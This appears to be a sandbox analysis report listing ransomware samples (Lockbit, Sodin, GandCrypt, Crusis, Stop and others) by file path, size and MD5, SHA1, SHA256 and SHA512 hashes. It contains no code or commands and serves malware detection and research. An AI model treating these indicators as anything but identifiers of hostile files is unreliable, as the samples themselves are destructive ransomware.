SHA51219cbdbd6290d4688ca474d3f117dfd9336c2d0d8477c6409207698e10e4e2251e989668735c7a5fe51a5ffb9968602612068113fc9b80232dd09d7f011e17937
-
Filesize
14KB
MD523f3d49411252cdd5086c9c822813159
SHA1fc6310ee6b6024400f80ebbbee8f85f6095aa775
SHA2563d33cf3e728607317063f33f416ea1fed710d1a0c4e5ae7f4f0128d1f282b7e4
SHA512fe2a7902603aab6569080c3f988a8954aaf4f27f68ba7949ac169ec30d396ba9f7c465ce7e4b44b7ed19006ef71a5f11e7b09814c36f8b39c73d12cdfbee8d1f
-
Filesize
14KB
MD5dd9a727dafcbc790403a0a64b22398ae
SHA16b1cc4a02e36bd9f7541f35b33b89095f3c505d5
SHA25612bcfa500cb1e549f9cf5ec3fec3ff3cead44c25ef242bb11e171954618792fa
SHA5124e93d9650273c71de1abfa17d3963775995b47e5c847d66bf94be3946fbbca557b1797f249c4ae280e91110c019f56dd840f3228f8e657958dfc399475bf94bb
-
Filesize
14KB
MD540a99b25c8acc2033ac852de535ad3a1
SHA19d63c3b4f4015731b5a20ffb966d33f166c7e8ca
SHA256cfe20f83c33994cfbf1ede8133792b73e57cbb7817f0fda339b5e9201675e001
SHA5125348c8b27e5c8b38a803e71dcfe023f4426bdd004bfbc19b091d1897a7d79cf40e463b40af7288d61d0f45354d952eeb1b930aaf995e16ece10d07d2d7c2c955
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe
Filesize581KB
MD57b29f64de08a37d9cf54c1fc018383ac
SHA1dc3e208475726f3dccda7878d44b84926b41a42a
SHA2564c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e
SHA5129ce4ceeae07f878a997503a59c0546622468afaf2b15fa80a0b4d106c0f7e4c2c47a54bb5381550a85baaf683e2b48b89125686fef95e853e994a653111c419e
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe
Filesize514KB
MD5660693df21666229e2627456eb719773
SHA148d534ba685ec3320cdb8098931db7d1fcb84c89
SHA256650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf
SHA51241fe3771edf9a85737d01f241d2e495b0b0ec25a3e8d583aee64a7c9d76c886aeada286274abdc21f4340c91b3b6ab81dfe9a9660727e921adc0e3e64f958735
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe
Filesize235KB
MD5beca53ebe027a5200ae7b0158f2d742b
SHA11af422f5bd6f4c4ba570fcd4b823c86f675af85b
SHA25657358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53
SHA51282d92d315b8a2505d4af0590da25dbd78a6f1c8cbc37317dc6963b0e15b88fc935165b6390e29c9221ff2ee86050bf3d6ee6d0bbb6479f7fd501a9a47c92bf80
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe
Filesize201KB
MD56d9a8ad016dfbbe545056d044faf4e41
SHA1d46110d74cc83e18deb9559a0eaa1726dcc0136a
SHA25690f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29
SHA5128b2f664e3920d543c80189d5588bbf78e15b97dc043e29afd67f171f60d94dab58dfd609ad86fe8976b915703f112ed3ed57352e7a711cfc538ffdc5e7d2ad6d
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe
Filesize441KB
MD5d62754f59314b383224ec08713535245
SHA16a2fd7abb0f1bf9e0e4c1ecef34ac0dcead1ac24
SHA256e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34
SHA5127245a472f7035516027890ba02f96600fe13449f9e798b70c49ea359b1da8f8e8560676a2a4816737f7d05c081c86dfa555e74015fb727e4ff50b87fe3729165
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe
Filesize464KB
MD528303a465d3906d3cea5c541beaa8805
SHA18960b87855345dbea807ecbcb0fbaa7d4ace48e7
SHA256331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2
SHA512e57e4c2f70cf869a36f8e7f8ad4aded5fcf1b42afdc64313fc5ba05a52def51c4caaf21dfbeeb3fbd762963ae96ff64f309135492627fa35c6de9d5a5137c3c4
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe
Filesize2.1MB
MD5e2ac730e1c5962210bd49cc22f7e6206
SHA185c24c5a01339507ea71692e4ba3661ac8170b3e
SHA2569920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3
SHA512eeac4dc5ee57e3a292a9506ebe33e32891664adca26ffeefb4b65fd6aa37b3cd21d612bd5897b40be364d6d114cf059f724456438f9e72b86981e4b97a583191
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Blocker.hnwj-0cbf1ed51ee17c6e30c9bffbd9de8422ac1026668c583c6dc0adedb04f93547a.exe
Filesize273KB
MD5487588a47b7ed9acac1c82193f47beaf
SHA149afda4b139807a5bd90395bf8686088f35a9c62
SHA2560cbf1ed51ee17c6e30c9bffbd9de8422ac1026668c583c6dc0adedb04f93547a
SHA51237a169a9d70e272bfa87ef1687fbe1949e85efff403229187c6d7eb2ba17760c03def775c299dcdd6e973e059beb125f03c6dc6157606ff1c2d0661cf27e39c1
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe
Filesize18.9MB
MD547faf988c6804b2d52ef0ddd7c78c95d
SHA14c63b465a46cf4a43d9c69b1a7b561b9ee8f8985
SHA25622bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50
SHA5123f477b2ba06cc80804c63e4745460a5573edc663f650a5f272748542fedf350c22f24a72cfdcb06d67f62dd79873e2fb1d31dfcca32b028b7de697ea354d782b
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exe
Filesize230KB
MD505b4365a8f106c681de5eee5f70e648b
SHA130f3651ffbc8921e8e0a28c472e42338c90149d4
SHA256fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce
SHA5123145cbf246a433b3abfea11b140f3804fdf033b0e61ea3e797a7b1fd0e658f00d5f4366bde4c9050a159132bc2df46b53a445855b547fc866e37ec84f2e8cb3d
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe
Filesize933KB
MD5c37771bc5eaf316cde7f35d4afecb7cd
SHA175c4fbcd9bfe15b5fff56c9a2e5a0c8bba2a00e5
SHA256a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8
SHA51295fdbd9e497f237234d1dfff6f14ac1283ddc2a44a4c684820e6057eab0fddfa24ccf13c2a0811b527d285ad8101d7b02f5a43b30e4a4c7c68c5a7ce0dd32156
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe
Filesize164KB
MD5628b93fd740421b0bd174e3ac2349bab
SHA113b2fa18d9332fe1f845302104d47d519fe7741f
SHA256b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464
SHA512c2a5855aacada6757cf3c526b3ef67a2d8e769a477184b0cf1a0333cf6462c9135ccddd1a479437ba249e19127f912852da6f1ccbc2d9d3ca4c81083132ac7aa
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe
Filesize170KB
MD5c8c5d8d3c888b6f1b37a66d4aefb16cd
SHA1b966d1e794d2dd3e23a875f3bcf1deb5b7b144b4
SHA2565cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19
SHA512bb431f3de149d7f1e3c4eea233350013506387fd33030f016dbb5a820b9ff3241b6641963272fecfcf12e26333123932d615424f372437c3384d73182d943493
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe
Filesize150KB
MD55761ee98b1c2fea31b5408516a8929ea
SHA14d043df23e55088bfc04c14dfb9ddb329a703cc1
SHA2560a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76
SHA5129dbf296719bc130bc700db94fd43985c32cb9de3b1867ed7c8666b62e4b9d0826b6df03cb125644c9338118d9caf679bfa1eb55da39f46b94db023bdcd9ff338
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Sodin.aak-3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57.exe
Filesize166KB
MD5340b6f816bfdcfcb466cfc126c976844
SHA1e2e3adfcf621166a9f5bb7ee9795b7914cda2095
SHA2563cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57
SHA5123e729878fe7ae2ea2f025d71d78226ddb5930b791143eb8c4ba4a7589d5944e5b0e37e8ffe1ea4983bbc66c71587e3a4b158b3e8a2b71ccbed2889c4778962f9
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Sodin.abd-74d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c.exe
Filesize114KB
MD58d1a17579cf2040cb5f66960265eba14
SHA14e9011d1ec66bae5185e729f368840ade929ab28
SHA25674d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c
SHA512576cd47f0e5bf78c690ec11f77bbbbc82003177a5ea6b78d45e9e1c597775373b9fc63c38321a0b37903663410fd4f37ea2a5ccb28a4b2acc56bb0f0c82ef0bd
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exe
Filesize181KB
MD5ac6d13307a1eca9e744a218be1caa629
SHA1c0e2fb803fe7133e3037e8092ea67c11cf3a9834
SHA25640ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103
SHA51282be75e2ba7442cf4c7cff8aad8e99a82427fe7d5fd7c0a7013adadde4eef0dfff42a0e50b8a9fa2bc25385fb312525cb2038446b520598472053819bf04342c
-
Filesize
91KB
MD50a99926653cfc8b20ed0b53d0f874470
SHA1496c2fa1cb51d4282a34af7d614d4630e558e64d
SHA25649cbfd3fea6bf884e52682c361a835f1587801da9fc54ebefe91d9818286badd
SHA51288eaeba6abb22abcf20f491649ab6f7b80b09113706657b80c0201f3d282e550a326274a948f0179852afd1bb559ed662b51e479941cfee3025dcd61f71a2fa3
-
Filesize
1KB
MD59eae221403c5be72d68c3d9d57929c50
SHA13d42513f82fef16caae23de44c471fcf68be0278
SHA2563d8ee1611692dcc7d2668f37765ac7d9df63a57715dc440d7484266f01a37b71
SHA5128429035b3432b75f9ebacac1f3b57f07a09cafddc0fac390cc76fe771c7735bc93661e7b29e60d9b48f22add09fa73c28e44e729e6938ce16eacd3af9ea25316
-
Filesize
181KB
MD50c80a997d37d930e7317d6dac8bb7ae1
SHA1018f13dfa43e103801a69a20b1fab0d609ace8a5
SHA256a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86
SHA512fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5
-
Filesize
37KB
MD5cb0edb910c78492d8c67e1eeaa0eba67
SHA1d7a75329da46c584dbe62468e33c64399ddae9bc
SHA2569d4a1e9c3e2d0090dcb7303d93cdb6b6155d4e80fa5e908c58520a1e0be59560
SHA5126e47883928613fc528ae89b2d25ae0651984fedfcc71b72f9c07fab2479dcbf6a6cc751d15658d0784d0b11dc0640eec00659003d051130dea6f5e94ad1889d6
-
Filesize
145B
MD5ca13857b2fd3895a39f09d9dde3cca97
SHA18b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0
SHA256cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae
SHA51255e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47
-
\??\c:\users\admin\desktop\00381\heur-trojan-ransom.msil.crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe
Filesize644KB
MD596cb155e96514fc795be12beccc7e2c6
SHA1db3c950cf0a42355e66f357ed3328e06f22d7df1
SHA256d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472
SHA5127390705bec19b27d19762327da34216714baeb4009daec8eab7817b00329168fc9435b715fb2ab347d746b50e7e3528a489b7336ae513ef815b30069aed020a0
-
\??\c:\users\admin\desktop\00381\trojan-ransom.win32.blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exe
Filesize112KB
MD54d6d643eea0deaaf9b543e2f65bc96d1
SHA1d7dba5b37d436d907c712e0f8c77fec269ff2f3d
SHA2562cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590
SHA5125d83a953b9efbec8a0baf121f7a121877f2162cc18d4f78a39cf9d2a2151e66b459de525acadc4f9ac49c6c1349e586b23856b659bdcec5739bd28fd970e3c60
-
\??\c:\users\admin\desktop\00381\trojan-ransom.win32.gandcrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe
Filesize73KB
MD50da771de8ebc33bbafaf6363b4794e29
SHA128bd73a074067d67c4bb29d5978286d7c56e05f2
SHA2561eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e
SHA51200b6ab9660800f7e747f2624f5d58906baf9f8f92b202ea304cfddbc58d0417aba19f4c48e75867b18a47f69a9e9345bb0d6a409f7a82788100dea7072c94dd3
-
\??\c:\users\admin\desktop\00381\trojan-ransom.win32.sagecrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe
Filesize245KB
MD5c07eac0b08eae7c6fcfa9e033e93b6ce
SHA1384bfde7d82002c61ac6b20208986ca285414815
SHA2568613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b
SHA512444795102e9b1cda39307357a30e48c571a4900af85c3c6fc814273c4e5304daa66cb88e753ce56e4dff353ebaeecf5603c471bd7e53c777fd7d6f80e57b11bb